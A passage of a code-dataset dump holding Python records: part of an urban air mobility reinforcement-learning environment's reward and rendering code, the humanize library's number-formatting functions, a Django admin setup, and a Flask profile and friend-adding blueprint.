else:\n            r_goal += 0.25\n\n        # aggregate reward components\n        r = (self.w_coll*r_coll + self.w_goal*r_goal)/self.w\n\n        # store\n        self.r = r\n        self.r_coll = r_coll\n        self.r_goal = r_goal\n\n    def _done(self):\n        # artificial done signal\n        if self.step_cnt >= self._max_episode_steps:\n            return True\n        return False\n\n    def _count_mistakes(self, entered_close):\n        self.N_enterances_closed_d += sum(entered_close)\n        for i, pi in enumerate(self.planes):\n            for j, pj in enumerate(self.planes):\n                if i < j:\n                    D = latlondist(latd1=pi.lat, lond1=pi.lon, latd2=pj.lat, lond2=pj.lon)\n                    if D <= self.accident_dist:\n                        self.N_accs += 1\n                    elif D <= self.incident_dist:\n                        self.N_incs += 1\n\n    def __str__(self):\n        return f\"Step: {self.step_cnt}, Sim-Time [s]: {int(self.sim_t)}, # Flight Taxis: {self.N_planes}\" + \"\\n\" +\\\n            f\"Time-to-open [s]: {int(self.dest.t_nxt_open)}, Time-since-open [s]: {int(self.dest.t_open_since)}\" + \"\\n\" +\\\n            f\"# Episode-Incidents: {self.N_incs}, # Episode-Accidents: {self.N_accs}\" + \"\\n\" +\\\n            f\"# Episode-Closed Vertiport Entrances: {self.N_enterances_closed_d}\"\n\n    def render(self, mode=None):\n        \"\"\"Renders the current environment.\"\"\"\n\n        # plot every nth timestep\n        if self.step_cnt % 1 == 0:\n\n            # init figure\n            if len(plt.get_fignums()) == 0:\n                if self.plot_reward and self.plot_state:\n                    self.f = plt.figure(figsize=(14, 8))\n                    self.gs = self.f.add_gridspec(2, 2)\n                    self.ax1 = self.f.add_subplot(self.gs[:, 0]) # ship\n                    self.ax2 = self.f.add_subplot(self.gs[0, 1]) # reward\n                    self.ax3 = self.f.add_subplot(self.gs[1, 1]) # state\n\n                elif self.plot_reward:\n                    self.f = plt.figure(figsize=(14, 8))\n                    self.gs = self.f.add_gridspec(1, 2)\n                    self.ax1 = self.f.add_subplot(self.gs[0, 0]) # ship\n                    self.ax2 = self.f.add_subplot(self.gs[0, 1]) # reward\n\n                elif self.plot_state:\n                    self.f = plt.figure(figsize=(14, 8))\n                    self.gs = self.f.add_gridspec(1, 2)\n                    self.ax1 = self.f.add_subplot(self.gs[0, 0]) # ship\n                    self.ax3 = self.f.add_subplot(self.gs[0, 1]) # state\n\n                else:\n                    self.f, self.ax1 = plt.subplots(1, 1, figsize=(10, 10))\n            
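# interactive mode: the figure refreshes without blocking the simulation loop\n            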
plt.ion()\n plt.show() \n\n # storage\n if self.plot_reward:\n if self.step_cnt == 0:\n if self.multi_policy:\n self.ax2.r = np.zeros((self.N_planes, self._max_episode_steps))\n self.ax2.r_coll = np.zeros((self.N_planes, self._max_episode_steps))\n self.ax2.r_goal = np.zeros((self.N_planes, self._max_episode_steps))\n else:\n self.ax2.r = np.zeros(self._max_episode_steps)\n self.ax2.r_coll = np.zeros(self._max_episode_steps)\n self.ax2.r_goal = np.zeros(self._max_episode_steps)\n else:\n if self.multi_policy:\n self.ax2.r[:, self.step_cnt] = self.r.flatten()\n self.ax2.r_coll[:, self.step_cnt] = self.r_coll.flatten()\n self.ax2.r_goal[:, self.step_cnt] = self.r_goal.flatten()\n else:\n self.ax2.r[self.step_cnt] = self.r if isinstance(self.r, float) else float(self.r[0])\n self.ax2.r_coll[self.step_cnt] = self.r_coll if isinstance(self.r_coll, float) else float(self.r_coll[0])\n self.ax2.r_goal[self.step_cnt] = self.r_goal if isinstance(self.r_goal, float) else float(self.r_goal[0])\n\n if self.plot_state:\n if self.step_cnt == 0:\n self.ax3.s = np.zeros((self.obs_size, self._max_episode_steps))\n else:\n if self.multi_policy:\n self.ax3.s[:, self.step_cnt] = self.state[0]\n else:\n self.ax3.s[:, self.step_cnt] = self.state\n\n # periodically clear and init\n if self.step_cnt % 50 == 0:\n\n # clearance\n self.ax1.clear()\n if self.plot_reward:\n self.ax2.clear()\n if self.plot_state:\n self.ax3.clear()\n\n # appearance\n self.ax1.set_title(\"Urban Air Mobility\")\n self.ax1.set_xlabel(\"Lon [°]\")\n self.ax1.set_ylabel(\"Lat [°]\")\n self.ax1.set_xlim(9.985, 10.015)\n self.ax1.set_ylim(9.985, 10.015)\n\n if self.plot_reward:\n self.ax2.set_xlabel(\"Timestep in episode\")\n self.ax2.set_ylabel(\"Reward of ID0\")\n self.ax2.set_xlim(0, 50*(np.ceil(self.step_cnt/50)+1))\n self.ax2.set_ylim(-7, 7)\n\n if self.plot_state:\n self.ax3.set_xlabel(\"Timestep in episode\")\n self.ax3.set_ylabel(\"State of Agent 0\")\n self.ax3.set_xlim(0, 50*(np.ceil(self.step_cnt/50)+1))\n self.ax3.set_ylim(-2, 5)\n\n # ---------------- non-animated artists ----------------\n # spawning area\n lats, lons = map(list, zip(*[qdrpos(latd1=self.dest.lat, lond1=self.dest.lon, qdr=deg, dist=meter_to_NM(self.dest.spawn_radius))\\\n for deg in self.clock_degs]))\n self.ax1.plot(lons, lats, color=\"grey\")\n\n # respawn area\n lats, lons = map(list, zip(*[qdrpos(latd1=self.dest.lat, lond1=self.dest.lon, qdr=deg, dist=meter_to_NM(self.dest.respawn_radius))\\\n for deg in self.clock_degs]))\n self.ax1.plot(lons, lats, color=\"black\")\n\n # ---------- animated artists: initial drawing ---------\n # step info\n self.ax1.info_txt = self.ax1.text(x=9.9865, y=10.012, s=\"\", fontdict={\"size\" : 9}, animated=True)\n\n # destination\n lats, lons = map(list, zip(*[qdrpos(latd1=self.dest.lat, lond1=self.dest.lon, qdr=deg, dist=meter_to_NM(self.dest.radius))\\\n for deg in self.clock_degs]))\n self.ax1.dest_ln = self.ax1.plot(lons, lats, color=self.dest.color, animated=True)[0]\n\n # aircraft information\n self.ax1.scs = []\n self.ax1.lns = []\n self.ax1.txts = []\n\n for i, p in enumerate(self.planes):\n\n # show aircraft\n self.ax1.scs.append(self.ax1.scatter([], [], marker=(3, 0, -p.hdg), color=COLORS[i], animated=True))\n\n # incident area\n self.ax1.lns.append(self.ax1.plot([], [], color=COLORS[i], animated=True)[0])\n\n # information\n self.ax1.txts.append(self.ax1.text(x=0.0, y=0.0, s=\"\", color=COLORS[i], fontdict={\"size\" : 8}, animated=True))\n\n if self.plot_reward:\n self.ax2.lns_agg = []\n self.ax2.lns_coll = []\n 
self.ax2.lns_goal = []\n\n if self.multi_policy:\n for i in range(self.N_planes):\n self.ax2.lns_agg.append(self.ax2.plot([], [], color=COLORS[i], label=f\"Agg {i}\", animated=True)[0])\n self.ax2.lns_coll.append(self.ax2.plot([], [], color=COLORS[i], label=f\"Collision {i}\", linestyle=\"dotted\", animated=True)[0])\n self.ax2.lns_goal.append(self.ax2.plot([], [], color=COLORS[i], label=f\"Goal {i}\", linestyle=\"dashed\", animated=True)[0])\n else:\n self.ax2.lns_agg.append(self.ax2.plot([], [], color=COLORS[0], label=f\"Agg\", animated=True)[0])\n self.ax2.lns_coll.append(self.ax2.plot([], [], color=COLORS[1], label=f\"Collision\", animated=True)[0])\n self.ax2.lns_goal.append(self.ax2.plot([], [], color=COLORS[2], label=f\"Goal\", animated=True)[0])\n\n self.ax2.legend()\n\n if self.plot_state:\n self.ax3.lns = []\n for i in range(self.obs_size):\n self.ax3.lns.append(self.ax3.plot([], [], label=self.obs_names[i], color=COLORS[i], animated=True)[0])\n self.ax3.legend()\n\n # ----------------- store background -------------------\n self.f.canvas.draw()\n self.ax1.bg = self.f.canvas.copy_from_bbox(self.ax1.bbox)\n if self.plot_reward:\n self.ax2.bg = self.f.canvas.copy_from_bbox(self.ax2.bbox)\n if self.plot_state:\n self.ax3.bg = self.f.canvas.copy_from_bbox(self.ax3.bbox)\n else:\n\n # ------------- restore the background ---------------\n self.f.canvas.restore_region(self.ax1.bg)\n if self.plot_reward:\n self.f.canvas.restore_region(self.ax2.bg)\n if self.plot_state:\n self.f.canvas.restore_region(self.ax3.bg)\n\n # ----------- animated artists: update ---------------\n # step info\n self.ax1.info_txt.set_text(self.__str__())\n self.ax1.draw_artist(self.ax1.info_txt)\n\n # destination\n self.ax1.dest_ln.set_color(self.dest.color)\n self.ax1.draw_artist(self.ax1.dest_ln)\n\n for i, p in enumerate(self.planes):\n\n # show aircraft\n self.ax1.scs[i].set_offsets(np.array([p.lon, p.lat]))\n self.ax1.draw_artist(self.ax1.scs[i])\n\n # incident area\n lats, lons = map(list, zip(*[qdrpos(latd1=p.lat, lond1=p.lon, qdr=deg, dist=meter_to_NM(self.incident_dist/2))\\\n for deg in self.clock_degs]))\n self.ax1.lns[i].set_data(lons, lats) \n self.ax1.draw_artist(self.ax1.lns[i])\n\n # information\n s = f\"id: {i}\" + \"\\n\" + f\"hdg: {p.hdg:.1f}\" + \"\\n\" + f\"alt: {p.alt:.1f}\" + \"\\n\" + \\\n f\"tas: {p.tas:.1f}\"\n\n if hasattr(self, \"ts_alive\"):\n s += \"\\n\" + f\"t alive: {int(self.ts_alive[i])}\"\n if self.ts_alive[i] == np.max(self.ts_alive):\n s += \" (Next!)\"\n\n if hasattr(p, \"role\"):\n s += \"\\n\" + f\"role: {p.role}\"\n self.ax1.txts[i].set_text(s)\n self.ax1.txts[i].set_position((p.lon, p.lat))\n self.ax1.draw_artist(self.ax1.txts[i])\n\n # reward\n if self.plot_reward:\n if self.multi_policy:\n for i in range(self.N_planes):\n self.ax2.lns_agg[i].set_data(np.arange(self.step_cnt+1), self.ax2.r[i][:self.step_cnt+1])\n self.ax2.lns_coll[i].set_data(np.arange(self.step_cnt+1), self.ax2.r_coll[i][:self.step_cnt+1])\n self.ax2.lns_goal[i].set_data(np.arange(self.step_cnt+1), self.ax2.r_goal[i][:self.step_cnt+1])\n\n self.ax2.draw_artist(self.ax2.lns_agg[i])\n self.ax2.draw_artist(self.ax2.lns_coll[i])\n self.ax2.draw_artist(self.ax2.lns_goal[i])\n else:\n self.ax2.lns_agg[0].set_data(np.arange(self.step_cnt+1), self.ax2.r[:self.step_cnt+1])\n self.ax2.lns_coll[0].set_data(np.arange(self.step_cnt+1), self.ax2.r_coll[:self.step_cnt+1])\n self.ax2.lns_goal[0].set_data(np.arange(self.step_cnt+1), self.ax2.r_goal[:self.step_cnt+1])\n \n self.ax2.draw_artist(self.ax2.lns_agg[0])\n 
self.ax2.draw_artist(self.ax2.lns_coll[0])\n self.ax2.draw_artist(self.ax2.lns_goal[0])\n\n # state\n if self.plot_state:\n for i in range(self.obs_size):\n self.ax3.lns[i].set_data(np.arange(self.step_cnt+1), self.ax3.s[i][:self.step_cnt+1])\n self.ax3.draw_artist(self.ax3.lns[i])\n\n # show it on screen\n self.f.canvas.blit(self.ax1.bbox)\n if self.plot_reward:\n self.f.canvas.blit(self.ax2.bbox)\n if self.plot_state:\n self.f.canvas.blit(self.ax3.bbox)\n \n plt.pause(0.05)\n","repo_name":"MarWaltz/TUD_RL","sub_path":"tud_rl/envs/_envs/UAM.py","file_name":"UAM.py","file_ext":"py","file_size_in_byte":30829,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"3"}
+{"seq_id":"35029791360","text":"\"\"\"Humanizing functions for numbers.\"\"\"\nfrom __future__ import annotations\n\nimport math\nimport re\nimport sys\nfrom fractions import Fraction\nfrom typing import TYPE_CHECKING\n\nfrom .i18n import _gettext as _\nfrom .i18n import _ngettext\nfrom .i18n import _ngettext_noop as NS_\nfrom .i18n import _pgettext as P_\nfrom .i18n import decimal_separator, thousands_separator\n\nif TYPE_CHECKING:\n if sys.version_info >= (3, 10):\n from typing import TypeAlias\n else:\n from typing_extensions import TypeAlias\n\n# This type can be better defined by typing.SupportsInt, typing.SupportsFloat\n# but that's a Python 3.8 only typing option.\nNumberOrString: TypeAlias = \"float | str\"\n\n\ndef _format_not_finite(value: float) -> str:\n \"\"\"Utility function to handle infinite and nan cases.\"\"\"\n if math.isnan(value):\n return \"NaN\"\n if math.isinf(value) and value < 0:\n return \"-Inf\"\n if math.isinf(value) and value > 0:\n return \"+Inf\"\n return \"\"\n\n\ndef ordinal(value: NumberOrString, gender: str = \"male\") -> str:\n \"\"\"Converts an integer to its ordinal as a string.\n\n For example, 1 is \"1st\", 2 is \"2nd\", 3 is \"3rd\", etc. Works for any integer or\n anything `int()` will turn into an integer. Anything else will return the output\n of str(value).\n\n Examples:\n ```pycon\n >>> ordinal(1)\n '1st'\n >>> ordinal(1002)\n '1002nd'\n >>> ordinal(103)\n '103rd'\n >>> ordinal(4)\n '4th'\n >>> ordinal(12)\n '12th'\n >>> ordinal(101)\n '101st'\n >>> ordinal(111)\n '111th'\n >>> ordinal(\"something else\")\n 'something else'\n >>> ordinal([1, 2, 3]) == \"[1, 2, 3]\"\n True\n\n ```\n Args:\n value (int, str, float): Integer to convert.\n gender (str): Gender for translations. Accepts either \"male\" or \"female\".\n\n Returns:\n str: Ordinal string.\n \"\"\"\n try:\n if not math.isfinite(float(value)):\n return _format_not_finite(float(value))\n value = int(value)\n except (TypeError, ValueError):\n return str(value)\n if gender == \"male\":\n t = (\n P_(\"0 (male)\", \"th\"),\n P_(\"1 (male)\", \"st\"),\n P_(\"2 (male)\", \"nd\"),\n P_(\"3 (male)\", \"rd\"),\n P_(\"4 (male)\", \"th\"),\n P_(\"5 (male)\", \"th\"),\n P_(\"6 (male)\", \"th\"),\n P_(\"7 (male)\", \"th\"),\n P_(\"8 (male)\", \"th\"),\n P_(\"9 (male)\", \"th\"),\n )\n else:\n t = (\n P_(\"0 (female)\", \"th\"),\n P_(\"1 (female)\", \"st\"),\n P_(\"2 (female)\", \"nd\"),\n P_(\"3 (female)\", \"rd\"),\n P_(\"4 (female)\", \"th\"),\n P_(\"5 (female)\", \"th\"),\n P_(\"6 (female)\", \"th\"),\n P_(\"7 (female)\", \"th\"),\n P_(\"8 (female)\", \"th\"),\n P_(\"9 (female)\", \"th\"),\n )\n if value % 100 in (11, 12, 13): # special case\n return f\"{value}{t[0]}\"\n return f\"{value}{t[value % 10]}\"\n\n\ndef intcomma(value: NumberOrString, ndigits: int | None = None) -> str:\n \"\"\"Converts an integer to a string containing commas every three digits.\n\n For example, 3000 becomes \"3,000\" and 45000 becomes \"45,000\". 
To maintain some\n compatibility with Django's `intcomma`, this function also accepts floats.\n\n Examples:\n ```pycon\n >>> intcomma(100)\n '100'\n >>> intcomma(\"1000\")\n '1,000'\n >>> intcomma(1_000_000)\n '1,000,000'\n >>> intcomma(1_234_567.25)\n '1,234,567.25'\n >>> intcomma(1234.5454545, 2)\n '1,234.55'\n >>> intcomma(14308.40, 1)\n '14,308.4'\n >>> intcomma(\"14308.40\", 1)\n '14,308.4'\n >>> intcomma(None)\n 'None'\n\n ```\n Args:\n value (int, float, str): Integer or float to convert.\n ndigits (int, None): Digits of precision for rounding after the decimal point.\n\n Returns:\n str: String containing commas every three digits.\n \"\"\"\n thousands_sep = thousands_separator()\n decimal_sep = decimal_separator()\n try:\n if isinstance(value, str):\n value = value.replace(thousands_sep, \"\").replace(decimal_sep, \".\")\n if not math.isfinite(float(value)):\n return _format_not_finite(float(value))\n if \".\" in value:\n value = float(value)\n else:\n value = int(value)\n else:\n if not math.isfinite(float(value)):\n return _format_not_finite(float(value))\n float(value)\n except (TypeError, ValueError):\n return str(value)\n\n if ndigits is not None:\n orig = \"{0:.{1}f}\".format(value, ndigits)\n else:\n orig = str(value)\n orig = orig.replace(\".\", decimal_sep)\n while True:\n new = re.sub(r\"^(-?\\d+)(\\d{3})\", rf\"\\g<1>{thousands_sep}\\g<2>\", orig)\n if orig == new:\n return new\n orig = new\n\n\npowers = [10**x for x in (3, 6, 9, 12, 15, 18, 21, 24, 27, 30, 33, 100)]\nhuman_powers = (\n NS_(\"thousand\", \"thousand\"),\n NS_(\"million\", \"million\"),\n NS_(\"billion\", \"billion\"),\n NS_(\"trillion\", \"trillion\"),\n NS_(\"quadrillion\", \"quadrillion\"),\n NS_(\"quintillion\", \"quintillion\"),\n NS_(\"sextillion\", \"sextillion\"),\n NS_(\"septillion\", \"septillion\"),\n NS_(\"octillion\", \"octillion\"),\n NS_(\"nonillion\", \"nonillion\"),\n NS_(\"decillion\", \"decillion\"),\n NS_(\"googol\", \"googol\"),\n)\n\n\ndef intword(value: NumberOrString, format: str = \"%.1f\") -> str:\n \"\"\"Converts a large integer to a friendly text representation.\n\n Works best for numbers over 1 million. For example, 1_000_000 becomes \"1.0 million\",\n 1200000 becomes \"1.2 million\" and \"1_200_000_000\" becomes \"1.2 billion\". 
Supports up\n to decillion (33 digits) and googol (100 digits).\n\n Examples:\n ```pycon\n >>> intword(\"100\")\n '100'\n >>> intword(\"12400\")\n '12.4 thousand'\n >>> intword(\"1000000\")\n '1.0 million'\n >>> intword(1_200_000_000)\n '1.2 billion'\n >>> intword(8100000000000000000000000000000000)\n '8.1 decillion'\n >>> intword(None)\n 'None'\n >>> intword(\"1234000\", \"%0.3f\")\n '1.234 million'\n\n ```\n Args:\n value (int, float, str): Integer to convert.\n format (str): To change the number of decimal or general format of the number\n portion.\n\n Returns:\n str: Friendly text representation as a string, unless the value passed could not\n be coaxed into an `int`.\n \"\"\"\n try:\n if not math.isfinite(float(value)):\n return _format_not_finite(float(value))\n value = int(value)\n except (TypeError, ValueError):\n return str(value)\n\n if value < 0:\n value *= -1\n negative_prefix = \"-\"\n else:\n negative_prefix = \"\"\n\n if value < powers[0]:\n return negative_prefix + str(value)\n\n for ordinal_, power in enumerate(powers[1:], 1):\n if value < power:\n chopped = value / float(powers[ordinal_ - 1])\n powers_difference = powers[ordinal_] / powers[ordinal_ - 1]\n if float(format % chopped) == powers_difference:\n chopped = value / float(powers[ordinal_])\n singular, plural = human_powers[ordinal_]\n return (\n negative_prefix\n + \" \".join(\n [format, _ngettext(singular, plural, math.ceil(chopped))]\n )\n ) % chopped\n\n singular, plural = human_powers[ordinal_ - 1]\n return (\n negative_prefix\n + \" \".join([format, _ngettext(singular, plural, math.ceil(chopped))])\n ) % chopped\n\n return negative_prefix + str(value)\n\n\ndef apnumber(value: NumberOrString) -> str:\n \"\"\"Converts an integer to Associated Press style.\n\n Examples:\n ```pycon\n >>> apnumber(0)\n 'zero'\n >>> apnumber(5)\n 'five'\n >>> apnumber(10)\n '10'\n >>> apnumber(\"7\")\n 'seven'\n >>> apnumber(\"foo\")\n 'foo'\n >>> apnumber(None)\n 'None'\n\n ```\n Args:\n value (int, float, str): Integer to convert.\n\n Returns:\n str: For numbers 0-9, the number spelled out. Otherwise, the number. 
This always\n returns a string unless the value was not `int`-able, then `str(value)`\n is returned.\n \"\"\"\n try:\n if not math.isfinite(float(value)):\n return _format_not_finite(float(value))\n value = int(value)\n except (TypeError, ValueError):\n return str(value)\n if not 0 <= value < 10:\n return str(value)\n return (\n _(\"zero\"),\n _(\"one\"),\n _(\"two\"),\n _(\"three\"),\n _(\"four\"),\n _(\"five\"),\n _(\"six\"),\n _(\"seven\"),\n _(\"eight\"),\n _(\"nine\"),\n )[value]\n\n\ndef fractional(value: NumberOrString) -> str:\n \"\"\"Convert to fractional number.\n\n There will be some cases where one might not want to show ugly decimal places for\n floats and decimals.\n\n This function returns a human-readable fractional number in form of fractions and\n mixed fractions.\n\n Pass in a string, or a number or a float, and this function returns:\n\n * a string representation of a fraction\n * or a whole number\n * or a mixed fraction\n * or the str output of the value, if it could not be converted\n\n Examples:\n ```pycon\n >>> fractional(0.3)\n '3/10'\n >>> fractional(1.3)\n '1 3/10'\n >>> fractional(float(1/3))\n '1/3'\n >>> fractional(1)\n '1'\n >>> fractional(\"ten\")\n 'ten'\n >>> fractional(None)\n 'None'\n\n ```\n Args:\n value (int, float, str): Integer to convert.\n\n Returns:\n str: Fractional number as a string.\n \"\"\"\n try:\n number = float(value)\n if not math.isfinite(number):\n return _format_not_finite(number)\n except (TypeError, ValueError):\n return str(value)\n whole_number = int(number)\n frac = Fraction(number - whole_number).limit_denominator(1000)\n numerator = frac.numerator\n denominator = frac.denominator\n if whole_number and not numerator and denominator == 1:\n # this means that an integer was passed in\n # (or variants of that integer like 1.0000)\n return f\"{whole_number:.0f}\"\n\n if not whole_number:\n return f\"{numerator:.0f}/{denominator:.0f}\"\n\n return f\"{whole_number:.0f} {numerator:.0f}/{denominator:.0f}\"\n\n\ndef scientific(value: NumberOrString, precision: int = 2) -> str:\n \"\"\"Return number in string scientific notation z.wq x 10ⁿ.\n\n Examples:\n ```pycon\n >>> scientific(float(0.3))\n '3.00 x 10⁻¹'\n >>> scientific(int(500))\n '5.00 x 10²'\n >>> scientific(-1000)\n '-1.00 x 10³'\n >>> scientific(1000, 1)\n '1.0 x 10³'\n >>> scientific(1000, 3)\n '1.000 x 10³'\n >>> scientific(\"99\")\n '9.90 x 10¹'\n >>> scientific(\"foo\")\n 'foo'\n >>> scientific(None)\n 'None'\n\n ```\n\n Args:\n value (int, float, str): Input number.\n precision (int): Number of decimal for first part of the number.\n\n Returns:\n str: Number in scientific notation z.wq x 10ⁿ.\n \"\"\"\n exponents = {\n \"0\": \"⁰\",\n \"1\": \"¹\",\n \"2\": \"²\",\n \"3\": \"³\",\n \"4\": \"⁴\",\n \"5\": \"⁵\",\n \"6\": \"⁶\",\n \"7\": \"⁷\",\n \"8\": \"⁸\",\n \"9\": \"⁹\",\n \"-\": \"⁻\",\n }\n try:\n value = float(value)\n if not math.isfinite(value):\n return _format_not_finite(value)\n except (ValueError, TypeError):\n return str(value)\n fmt = \"{:.%se}\" % str(int(precision))\n n = fmt.format(value)\n part1, part2 = n.split(\"e\")\n # Remove redundant leading '+' or '0's (preserving the last '0' for 10⁰).\n part2 = re.sub(r\"^\\+?(\\-?)0*(.+)$\", r\"\\1\\2\", part2)\n\n new_part2 = []\n for char in part2:\n new_part2.append(exponents[char])\n\n final_str = part1 + \" x 10\" + \"\".join(new_part2)\n\n return final_str\n\n\ndef clamp(\n value: float,\n format: str = \"{:}\",\n floor: float | None = None,\n ceil: float | None = None,\n floor_token: str = \"<\",\n 
ceil_token: str = \">\",\n) -> str:\n \"\"\"Returns number with the specified format, clamped between floor and ceil.\n\n If the number is larger than ceil or smaller than floor, then the respective limit\n will be returned, formatted and prepended with a token specifying as such.\n\n Examples:\n ```pycon\n >>> clamp(123.456)\n '123.456'\n >>> clamp(0.0001, floor=0.01)\n '<0.01'\n >>> clamp(0.99, format=\"{:.0%}\", ceil=0.99)\n '99%'\n >>> clamp(0.999, format=\"{:.0%}\", ceil=0.99)\n '>99%'\n >>> clamp(1, format=intword, floor=1e6, floor_token=\"under \")\n 'under 1.0 million'\n >>> clamp(None) is None\n True\n\n ```\n\n Args:\n value (int, float): Input number.\n format (str OR callable): Can either be a formatting string, or a callable\n function that receives value and returns a string.\n floor (int, float): Smallest value before clamping.\n ceil (int, float): Largest value before clamping.\n floor_token (str): If value is smaller than floor, token will be prepended\n to output.\n ceil_token (str): If value is larger than ceil, token will be prepended\n to output.\n\n Returns:\n str: Formatted number. The output is clamped between the indicated floor and\n ceil. If the number is larger than ceil or smaller than floor, the output\n will be prepended with a token indicating as such.\n\n \"\"\"\n if value is None:\n return None\n\n if not math.isfinite(value):\n return _format_not_finite(value)\n\n if floor is not None and value < floor:\n value = floor\n token = floor_token\n elif ceil is not None and value > ceil:\n value = ceil\n token = ceil_token\n else:\n token = \"\"\n\n if isinstance(format, str):\n return token + format.format(value)\n\n if callable(format):\n return token + format(value)\n\n msg = (\n \"Invalid format. Must be either a valid formatting string, or a function \"\n \"that accepts value and returns a string.\"\n )\n raise ValueError(msg)\n\n\ndef metric(value: float, unit: str = \"\", precision: int = 3) -> str:\n \"\"\"Return a value with a metric SI unit-prefix appended.\n\n Examples:\n ```pycon\n >>> metric(1500, \"V\")\n '1.50 kV'\n >>> metric(2e8, \"W\")\n '200 MW'\n >>> metric(220e-6, \"F\")\n '220 μF'\n >>> metric(1e-14, precision=4)\n '10.00 f'\n\n ```\n\n The unit prefix is always chosen so that non-significant zero digits are required.\n i.e. `123,000` will become `123k` instead of `0.123M` and `1,230,000` will become\n `1.23M` instead of `1230K`. 
For numbers that are either too huge or too tiny to\n represent without resorting to either leading or trailing zeroes, it falls back to\n `scientific()`.\n ```pycon\n >>> metric(1e40)\n '1.00 x 10⁴⁰'\n\n ```\n\n Args:\n value (int, float): Input number.\n unit (str): Optional base unit.\n precision (int): The number of digits the output should contain.\n\n Returns:\n str:\n \"\"\"\n if not math.isfinite(value):\n return _format_not_finite(value)\n exponent = int(math.floor(math.log10(abs(value)))) if value != 0 else 0\n\n if exponent >= 33 or exponent < -30:\n return scientific(value, precision - 1) + unit\n\n value /= 10 ** (exponent // 3 * 3)\n if exponent >= 3:\n ordinal_ = \"kMGTPEZYRQ\"[exponent // 3 - 1]\n elif exponent < 0:\n ordinal_ = \"mμnpfazyrq\"[(-exponent - 1) // 3]\n else:\n ordinal_ = \"\"\n value_ = format(value, \".%if\" % (precision - (exponent % 3) - 1))\n if not (unit or ordinal_) or unit in (\"°\", \"′\", \"″\"):\n space = \"\"\n else:\n space = \" \"\n\n return f\"{value_}{space}{ordinal_}{unit}\"\n","repo_name":"python-humanize/humanize","sub_path":"src/humanize/number.py","file_name":"number.py","file_ext":"py","file_size_in_byte":16246,"program_lang":"python","lang":"en","doc_type":"code","stars":301,"dataset":"github-code","pt":"3"}
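# The humanize excerpt above repeatedly calls _format_not_finite() for NaN and
# +/-inf inputs, but its definition sits outside this excerpt. A minimal
# stand-in consistent with how it is called (a float in, a string out) might
# look like the sketch below; the exact upstream wording of the result strings
# is an assumption, not confirmed by this snippet.
import math

def _format_not_finite(value: float) -> str:
    # Map the three non-finite floats to readable names; anything finite
    # reaching here would be a caller bug, so fall back to str().
    if math.isnan(value):
        return "NaN"
    if math.isinf(value):
        return "+Inf" if value > 0 else "-Inf"
    return str(value)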
+{"seq_id":"12796179926","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom .models import County, Academy, Player, Admin\nfrom .forms import AddUser\n\n\nclass CustomUserAdmin(UserAdmin):\n fieldsets = (\n (None, {\"fields\": (\"name\", \"password\", \"role\")}),\n (\n \"Permissions\",\n {\n \"fields\": (\n \"is_active\",\n \"is_staff\",\n \"is_superuser\",\n \"groups\",\n \"user_permissions\",\n )\n },\n ),\n )\n add_fieldsets = (\n (\n None,\n {\n \"classes\": (\"wide\",),\n \"fields\": (\"name\", \"password1\", \"password2\", \"role\"),\n },\n ),\n )\n\n list_display = (\"name\", \"role\", \"is_staff\")\n list_filter = (\"is_staff\", \"is_superuser\", \"is_active\", \"groups\")\n\n search_fields = (\"name\",)\n ordering = (\"name\",)\n filter_horizontal = (\n \"groups\",\n \"user_permissions\",\n )\n\n\nadmin.site.register(County)\nadmin.site.register(Academy)\nadmin.site.register(Player)\nadmin.site.register(Admin, CustomUserAdmin)\n","repo_name":"hawkinswinja/player-manager","sub_path":"fkf/manager/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"21836522107","text":"from flask import Blueprint, flash, render_template, redirect, url_for\r\nfrom flask_wtf import FlaskForm\r\nfrom wtforms import StringField, SubmitField, Label, FileField\r\nfrom wtforms.validators import ValidationError, DataRequired\r\nfrom flask_login import login_required, current_user\r\nfrom flask_login import current_user\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom models import User\r\nimport base64\r\n\r\ndb = SQLAlchemy()\r\n\r\nprofile_blueprint = Blueprint(\"profile_bp\", __name__)\r\n\r\ndef validate_id(form, field):\r\n if len(field.data) != 14:\r\n raise ValidationError(\"The ID to add a friend must be a 14 characters long ID!\")\r\n\r\n friend = db.session.query(User).filter_by(id_for_friendship=field.data).first()\r\n\r\n if friend is None:\r\n raise ValidationError(\"This ID does not correspond to any user, check again or ask your friend to send it back\")\r\n \r\n if friend.id == current_user.id:\r\n raise ValidationError(\"You can't add yourself as a friend\")\r\n\r\nclass AddFriend(FlaskForm):\r\n id_for_friendship = StringField(\"Id for friendship\", validators=[DataRequired(), validate_id])\r\n submit = SubmitField(\"Search\")\r\n\r\nclass ChangeProfilePictureForm(FlaskForm):\r\n change_propic = Label(field_id=\"image\", text=\"\")\r\n image = FileField(\"Image file\")\r\n \r\n\r\n@profile_blueprint.route('/profile', methods=['GET', 'POST'])\r\n@login_required\r\ndef profile():\r\n\r\n my_friends = list(User.query.filter_by(id=current_user.id).first().friends)\r\n\r\n change_profile_picture_form = ChangeProfilePictureForm()\r\n add_friend_form = AddFriend()\r\n\r\n if change_profile_picture_form.image.data and change_profile_picture_form.validate_on_submit():\r\n change_profile_picture(change_profile_picture_form)\r\n\r\n if add_friend_form.submit.data and add_friend_form.validate_on_submit():\r\n add_friend(add_friend_form)\r\n\r\n return render_template('profile.html', user=current_user, friends=my_friends, add_friend_form=add_friend_form, change_form=change_profile_picture_form)\r\n\r\ndef change_profile_picture(form):\r\n file = form.image.data\r\n new_profile_picture = file.read()\r\n new_rendered_profile_picture = base64.b64encode(new_profile_picture).decode('ascii')\r\n\r\n user = db.session.query(User).filter_by(id=current_user.id).first()\r\n\r\n user.rendered_profile_picture = new_rendered_profile_picture\r\n user.profile_picture = new_profile_picture\r\n\r\n db.session.commit()\r\n return redirect(url_for('profile_bp.profile'))\r\n\r\ndef add_friend(form):\r\n\r\n id_for_friendship = form.id_for_friendship.data\r\n\r\n friend = db.session.query(User).filter_by(id_for_friendship=id_for_friendship).first()\r\n\r\n myself = db.session.query(User).filter_by(id=current_user.id).first()\r\n \r\n if friend in myself.friends:\r\n flash(friend.name + \" \" + friend.surname + \" is already your friend\", \"warning\")\r\n return redirect(url_for('profile_bp.profile'))\r\n\r\n myself.friends.append(friend)\r\n friend.friends.append(myself)\r\n\r\n db.session.commit()\r\n \r\n \r\n flash(friend.name + \" \" + friend.surname + \" has been added to your friends\", \"message\")\r\n return 